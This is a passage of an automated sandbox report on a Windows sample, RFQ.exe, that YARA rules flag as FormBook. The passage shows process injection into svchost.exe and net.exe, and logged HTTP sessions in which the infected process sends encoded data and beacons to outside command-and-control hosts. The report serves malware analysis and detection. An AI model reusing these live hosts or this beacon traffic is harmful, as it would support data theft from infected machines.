                                                                        Data Ascii: 7j=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZgc+Vn4ToFzNvqng5ZJQP5QandBap15K48B4V4g58Nqkozag/BTb59uyxdLy7UifxBvN6XTJLS+anzQGITQ3MyyP6x3R06rb8Yb+0/Hyqx+jtaM74M9EJu+ZSBjkb1w+FMi+IsH8hUHYZNn/a4XMRCZmxlQGE3pfo6PnfXHDNGHRhVvYVpYUGdJa1BA75+im7QPhZAORSsGFEagsZQD1nLFksemAHZHHr0dn6CFuAWbBN7AWGjekfhIg3lZPMlpQe1mKj1DrFpT8PyBEKzCvzh8yFktHzadSKfCpPKAvzOSA5U+QpPSx4Sc5Ds69m873XJtB5yxxBqTyEjHJpLPFC0ttmZIDYJmUrsYKuH6WjOSGt38BA1Le+v3P4/5JAA8wWUmj4+THxI1fJi6Y1Ol00wciP4S9910tKkFIog7Crleqle25dhRXv/woMI55GwC2hEu/gbZn6mvSoXwbLkzJsnrdcT3tHv+VYy8rmE0i8ZxXdMgJeI6I/W6/Ybo3fbu5CwLDvkWp2996ognOznZs9CxPSUYe05hupqwxEVjtL9zDy7uPbTT6zfnkCHky2bkAJVYLUKi27p6FgFyx1rEp0FiRrDgLddE4RYE/V1c7uxXkmpzZ7oVjiyUOA4ea5Gv3M+AdxqxjXL8PnOR06nO9OrKYbaRkntRT1cEZJcW0U5d/fM560inUiAoTFPVC/5AdMr+TGUZtYuTH8gE2HApJSXSX1u6zX7qVe0RYK+48lO9KQuLh1u7yXyzS7cZWOIQsdrQkRM+v6rQAwzlLay2LZ73oCUqjuWp83czA8Wtgt+6zraw2f9MBX5sLqJy5hZ1uM8NcQwlJlCQvISrbHGR2wFdiLeRKjmnQDxUHXPIP6lrc76vANDQ6IU3slUPORsbspZbXTSCqJ3PHO8OBV+n0CIgqCmp9gO76M7MoS8lzfnP625GWwyAtrwV72ML8Va7qOancnsYQ [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.7498743.33.130.190803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:59:46.378237963 CET387OUTGET /0m8a/?UvgPX=o0HdzhbpI6gx&7j=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo4fbiPNZTItUz1VN35oCbCkoE872J7CJYymsP5Px3u6hB+1hbmngRsUR HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.fiqsth.vip
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:59:48.111644983 CET417INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 16:59:48 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 277
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 76 67 50 58 3d 6f 30 48 64 7a 68 62 70 49 36 67 78 26 37 6a 3d 67 33 30 48 51 70 64 2b 48 67 4d 78 46 4f 73 76 79 34 66 42 44 34 65 50 44 47 2b 78 53 41 66 4c 6f 68 47 31 32 56 78 2b 57 4d 59 6a 2b 77 4b 41 52 4a 74 62 63 4f 43 77 6f 70 4e 77 41 74 74 79 4f 53 4e 33 58 36 6b 36 53 36 6f 44 32 7a 30 2b 2f 39 64 41 6f 34 66 62 69 50 4e 5a 54 49 74 55 7a 31 56 4e 33 35 6f 43 62 43 6b 6f 45 38 37 32 4a 37 43 4a 59 79 6d 73 50 35 50 78 33 75 36 68 42 2b 31 68 62 6d 6e 67 52 73 55 52 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UvgPX=o0HdzhbpI6gx&7j=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo4fbiPNZTItUz1VN35oCbCkoE872J7CJYymsP5Px3u6hB+1hbmngRsUR"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.7498753.33.130.190803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:59:53.217937946 CET649OUTPOST /ezyn/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.bio-thymus.com
                                                                        Origin: http://www.bio-thymus.com
                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 78 61 65 4b 4f 5a 38 33 64 57 31 66 7a 39 35 5a 71 63 54 35 4a 68 5a 50 51 74 6f 35 62 59 34 62 31 39 4c 69 62 5a 44 43 32 59 2b 30 58 54 65 49 41 2f 2f 4f 61 30 46 49 30 69 66 35 39 69 68 33 47 7a 39 54 4b 66 41 73 4e 76 34 56 42 32 41 76 38 4a 4d 79 58 64 43 42 77 38 70 51 65 7a 56 2b 49 33 6e 51 57 6f 4e 79 62 53 34 2b 56 54 59 6f 55 68 75 37 69 4c 42 38 72 55 63 63 6d 69 76 41 7a 63 75 77 63 35 4c 45 7a 53 33 4d 52 58 57 79 77 55 42 39 39 38 4c 66 39 6f 48 53 4a 38 7a 68 7a 4a 55 66 68 55 6e 52 76 34 62 63 44 6b 4c 54 77 77 38 66 4b 38 43 35 7a 53 41 50 38 66 2f 37 35 6b 53 76 47 51 3d 3d
                                                                        Data Ascii: 7j=EnYTLsMVnAFLxaeKOZ83dW1fz95ZqcT5JhZPQto5bY4b19LibZDC2Y+0XTeIA//Oa0FI0if59ih3Gz9TKfAsNv4VB2Av8JMyXdCBw8pQezV+I3nQWoNybS4+VTYoUhu7iLB8rUccmivAzcuwc5LEzS3MRXWywUB998Lf9oHSJ8zhzJUfhUnRv4bcDkLTww8fK8C5zSAP8f/75kSvGQ==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.7498763.33.130.190803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:59:55.768888950 CET669OUTPOST /ezyn/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.bio-thymus.com
                                                                        Origin: http://www.bio-thymus.com
                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 63 62 79 63 37 69 61 63 76 43 31 59 2b 30 63 7a 65 4e 45 2f 2f 37 61 7a 4e 41 30 6a 6a 35 39 69 31 33 47 7a 74 54 4e 6f 63 6a 4e 2f 34 74 4a 57 41 58 79 70 4d 79 58 64 43 42 77 34 42 2b 65 31 39 2b 4c 47 58 51 57 4b 31 78 48 43 34 2f 42 44 59 6f 51 68 75 2f 69 4c 42 65 72 56 42 7a 6d 67 58 41 7a 5a 53 77 53 49 4c 48 36 53 32 4a 4a 33 58 77 31 78 63 46 37 75 7a 6d 34 5a 6a 32 41 65 48 34 32 2f 56 39 37 32 72 39 78 70 6a 6e 48 6d 76 6c 6e 57 68 71 49 39 47 68 2b 77 30 75 6a 6f 61 52 30 32 7a 72 51 76 42 62 6f 70 67 35 74 47 45 69 75 32 2b 4b 59 66 68 51 4e 50 41 3d
                                                                        Data Ascii: 7j=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrcbyc7iacvC1Y+0czeNE//7azNA0jj59i13GztTNocjN/4tJWAXypMyXdCBw4B+e19+LGXQWK1xHC4/BDYoQhu/iLBerVBzmgXAzZSwSILH6S2JJ3Xw1xcF7uzm4Zj2AeH42/V972r9xpjnHmvlnWhqI9Gh+w0ujoaR02zrQvBbopg5tGEiu2+KYfhQNPA=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.7498773.33.130.190803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:59:58.375539064 CET1682OUTPOST /ezyn/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.bio-thymus.com
                                                                        Origin: http://www.bio-thymus.com
                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 55 62 79 75 7a 69 59 2f 58 43 30 59 2b 30 43 44 65 4d 45 2f 2f 63 61 79 70 45 30 6a 76 70 39 6e 78 33 48 56 68 54 49 64 6f 6a 47 2f 34 74 46 32 41 73 38 4a 4d 64 58 64 54 4b 77 38 6c 2b 65 31 39 2b 4c 45 50 51 66 34 4e 78 58 79 34 2b 56 54 59 6b 55 68 75 44 69 4c 59 70 72 56 46 5a 6e 55 72 41 30 39 4f 77 51 36 54 48 6d 43 32 4c 63 33 58 53 31 78 59 61 37 75 76 45 34 5a 48 51 41 65 2f 34 33 34 73 44 2b 45 2b 6a 6c 2b 66 49 45 55 75 45 71 55 4e 4c 48 76 65 33 32 67 6f 6f 6d 37 75 79 30 56 2b 6c 63 4b 6c 63 34 62 59 38 68 6c 6f 78 68 32 54 63 4e 2f 56 31 4a 49 4a 38 49 4d 79 45 68 6a 7a 36 75 68 72 68 31 36 6e 55 50 2b 68 38 75 45 38 2f 4e 69 53 32 64 59 30 35 52 44 51 57 58 56 69 4d 71 52 72 5a 77 36 64 45 30 6a 67 6b 46 56 48 78 4e 42 38 4b 6f 52 4b 6f 57 58 73 58 35 6e 44 43 63 34 74 63 62 4b 6d 6a 34 77 52 7a 66 75 6c 4d 37 32 78 4f 59 70 76 71 57 78 37 79 69 7a 2f [TRUNCATED]
                                                                        Data Ascii: 7j=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrUbyuziY/XC0Y+0CDeME//caypE0jvp9nx3HVhTIdojG/4tF2As8JMdXdTKw8l+e19+LEPQf4NxXy4+VTYkUhuDiLYprVFZnUrA09OwQ6THmC2Lc3XS1xYa7uvE4ZHQAe/434sD+E+jl+fIEUuEqUNLHve32goom7uy0V+lcKlc4bY8hloxh2TcN/V1JIJ8IMyEhjz6uhrh16nUP+h8uE8/NiS2dY05RDQWXViMqRrZw6dE0jgkFVHxNB8KoRKoWXsX5nDCc4tcbKmj4wRzfulM72xOYpvqWx7yiz/7beDIPtKH1rjXmZWF9zcpkmxl5sGZbRwv0bjyFkbMGnVxzyCq9qql60Qwh7W4rV5p5ngszZzBFXx22jDtzl/EEnh+tyH/Iv+6C7Vmr5sMZvYscderWFqC8oBeEN/ekwS/WBEv11bdMmUaQWZurUiV1W8X4OWgOgl0jbivE1e8Xd65sD6KduYafuIIpMa4JIZDBf/6V7bNkS86VeEsqm4Kr1f5IGFAYkRUdeNNJMCV/hCbA71ttrKnJBjH8X8PKhMU83/SryyDFar5aH4BeZd3RXQMh+DHgEsBM0Ml0VrkaGLbWeFmRsCBItA7TDscPPY+ThenYP9oEu3qoYZUWzN4UaRDQ+8zMLdIIJjUAePKa2Gpxagj8+ttHglHcp5coiZZNq6meBQ6V6HTC/7HvSCxbODQB2J9QKs6CmZFpVn7ThU0PATD5goNkIeIoKjYcMbuFdI0WypEVl6QQwMSHPtPmIfdLdJUuetIh7F+/8Al/l4/ndnTqjgjEGY684kmH8yp0rSG0kCjZVKF/VzrqWD5l9hvIKPM5yozR0HTujJkj2M6TswOukMGHpN/Ut0IaMII1bus8utEshvXGNFIIw3O/IwCE0voSGND4W5zTYONkM6wCgmWK2JtT2qBv5By8t6LCL0URutGwUw0TYbVS0QiEQ/m9+38yptFp [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.2.7498783.33.130.190803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 18:00:01.173201084 CET391OUTGET /ezyn/?7j=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKN8+Alsd/uAlfqbny7J4c2YDLjDocbldGRQwWRw5cBSMls9XvUBQui7N&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.bio-thymus.com
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 18:00:01.690964937 CET417INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 17:00:01 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 277
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 6a 3d 4a 6c 77 7a 49 5a 77 49 31 78 4a 46 71 6f 75 54 41 71 51 69 47 69 35 46 6e 5a 4a 65 70 2f 44 41 51 51 74 49 66 2f 46 30 54 38 77 70 2f 2f 50 61 66 74 62 67 73 71 43 44 57 67 4b 79 51 62 2f 77 4e 33 6c 31 34 51 48 6d 35 53 39 44 47 54 73 78 45 64 45 4d 4b 4e 38 2b 41 6c 73 64 2f 75 41 6c 66 71 62 6e 79 37 4a 34 63 32 59 44 4c 6a 44 6f 63 62 6c 64 47 52 51 77 57 52 77 35 63 42 53 4d 6c 73 39 58 76 55 42 51 75 69 37 4e 26 55 76 67 50 58 3d 6f 30 48 64 7a 68 62 70 49 36 67 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7j=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKN8+Alsd/uAlfqbny7J4c2YDLjDocbldGRQwWRw5cBSMls9XvUBQui7N&UvgPX=o0HdzhbpI6gx"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.2.74987947.52.221.8803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 18:00:07.365875006 CET649OUTPOST /9ezc/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.wukong.college
                                                                        Origin: http://www.wukong.college
                                                                        Referer: http://www.wukong.college/9ezc/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 75 70 74 4e 45 6e 31 68 79 43 49 76 32 4e 52 55 58 69 62 79 6d 65 34 7a 34 4d 72 56 59 72 78 6c 51 70 5a 33 4e 45 36 6b 30 43 5a 4f 6e 52 36 6a 35 68 44 71 35 30 6f 76 56 73 4e 46 6c 71 6e 78 54 39 71 78 73 64 31 48 35 6b 68 30 67 6e 70 79 61 74 51 63 71 78 6d 31 4a 4d 52 4e 4a 34 37 30 58 47 75 45 57 66 6c 65 43 57 77 74 48 41 50 4a 68 46 4d 6d 42 34 6c 61 64 73 46 50 70 4f 62 31 67 71 43 66 47 41 49 4c 4b 57 69 59 58 72 31 6e 34 4b 58 56 41 68 77 37 65 79 4b 38 71 4f 48 63 64 2f 46 43 31 4b 4a 77 79 55 6a 4e 32 54 2b 78 78 56 7a 78 33 47 31 50 76 63 54 6e 62 57 54 32 4e 31 46 34 77 3d 3d
                                                                        Data Ascii: 7j=8vbH32UxUjL6ouptNEn1hyCIv2NRUXibyme4z4MrVYrxlQpZ3NE6k0CZOnR6j5hDq50ovVsNFlqnxT9qxsd1H5kh0gnpyatQcqxm1JMRNJ470XGuEWfleCWwtHAPJhFMmB4ladsFPpOb1gqCfGAILKWiYXr1n4KXVAhw7eyK8qOHcd/FC1KJwyUjN2T+xxVzx3G1PvcTnbWT2N1F4w==
                                                                        Nov 7, 2024 18:00:08.341720104 CET390INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 17:00:08 GMT
                                                                        Server: Apache
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Content-Length: 179
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                        Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.2.74988047.52.221.8803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 18:00:09.915268898 CET669OUTPOST /9ezc/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.wukong.college
                                                                        Origin: http://www.wukong.college
                                                                        Referer: http://www.wukong.college/9ezc/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 2f 78 6b 30 6c 5a 6c 38 45 36 6a 30 43 5a 46 48 52 2f 67 4a 68 79 71 35 77 57 76 51 4d 4e 46 6c 2b 6e 78 51 70 71 78 66 31 79 47 70 6b 30 2f 41 6e 76 74 4b 74 51 63 71 78 6d 31 4a 59 37 4e 4a 67 37 33 6e 32 75 48 79 4c 6d 41 53 57 7a 36 33 41 50 4e 68 45 6b 6d 42 35 43 61 66 59 37 50 72 6d 62 31 6c 75 43 66 55 6b 4c 42 4b 57 6b 47 6e 71 43 71 49 72 4a 56 51 31 49 2b 6f 75 4d 6b 4e 65 4d 5a 72 2b 6e 59 58 47 6c 75 6a 73 59 4a 30 33 49 6d 58 49 47 7a 32 43 74 43 4e 6f 79 34 73 7a 35 37 66 55 42 75 4d 2f 59 31 52 64 52 4a 47 55 53 75 77 55 76 71 59 6c 34 74 6b 55 3d
                                                                        Data Ascii: 7j=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7Wq/xk0lZl8E6j0CZFHR/gJhyq5wWvQMNFl+nxQpqxf1yGpk0/AnvtKtQcqxm1JY7NJg73n2uHyLmASWz63APNhEkmB5CafY7Prmb1luCfUkLBKWkGnqCqIrJVQ1I+ouMkNeMZr+nYXGlujsYJ03ImXIGz2CtCNoy4sz57fUBuM/Y1RdRJGUSuwUvqYl4tkU=
                                                                        Nov 7, 2024 18:00:10.871099949 CET390INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 17:00:10 GMT
                                                                        Server: Apache
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Content-Length: 179
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                        Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:1
                                                                        Start time:11:57:04
                                                                        Start date:07/11/2024
                                                                        Path:C:\Users\user\Desktop\RFQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                        Imagebase:0x400000
                                                                        File size:1'338'211 bytes
                                                                        MD5 hash:85496E3BD4F547ED3ECB4BBA94401773
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:11:57:05
                                                                        Start date:07/11/2024
                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                        Imagebase:0xca0000
                                                                        File size:46'504 bytes
                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1507308924.00000000061A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:11:57:13
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe"
                                                                        Imagebase:0xa50000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3129016508.0000000005600000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:11
                                                                        Start time:11:57:21
                                                                        Start date:07/11/2024
                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                        Imagebase:0x750000
                                                                        File size:47'104 bytes
                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3121215291.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:12
                                                                        Start time:13:55:13
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Wow64 process (32bit):true
